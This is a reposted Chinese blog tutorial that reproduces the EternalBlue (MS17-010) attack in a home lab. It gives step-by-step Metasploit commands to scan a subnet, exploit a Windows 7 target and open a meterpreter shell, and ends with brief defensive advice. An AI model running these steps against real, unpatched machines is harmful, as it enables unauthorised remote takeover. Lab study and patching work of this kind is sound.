1.什么是永恒之蓝:
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 ----百度百科
2.复刻:
工具:kali-linux 2022(攻击机)(IP:192.168.0,108)
windows7 X64(靶机)(已经打开445端口)(IP:192.168.0.104)
两系统在同一个网段
方法:
准备:
1.查找使用4444端口的程序
lsof -i:4444
2.杀掉使用4444端口的程序
kill -9 PID
PID就是上面查找到的程序的编号,如果不把进程杀掉,后面会报错
1.加载工具
msfconsole
2.搜索攻击模块
search ms17-010
3.选择攻击模块(这个是搜索的)
use auxiliary/scanner/smb/smb_ms17_010
4.看一下要设置的参数
show options
5.设置IP(就是在这个网段下搜索有漏洞的IP)
set rhosts 192.168.0.1/24
6.设置线程
set threads 50
7.开始搜索
run
8.更换攻击模块
use windows/smb/ms17_010_eternalblue
9.查看要设置的参数
show options
10.设置IP
set rhosts 192.168.0.104(这就是填我们之前搜到的IP)
11.看一下可否攻击
check
12.开始攻击
run
这时候就攻击成功,然后我们就进到了meterpreter
1.屏幕截图
screenshot
2.进入shell
shell
3.更改一下编码,要不然都是乱码
chcp 65001
后面的就简单了。
ms17-010永恒之蓝渗透攻击
防范:1.开启防火墙,关闭445端口
2.安装杀毒软件
3.及时更新windows,微软在2017年发布了ms17-010的补丁
标签:
安全
本文转载自: https://blog.csdn.net/lijingheng66/article/details/125732102
版权归原作者 ljhelloworld 所有, 如有侵权,请联系我们删除。
版权归原作者 ljhelloworld 所有, 如有侵权,请联系我们删除。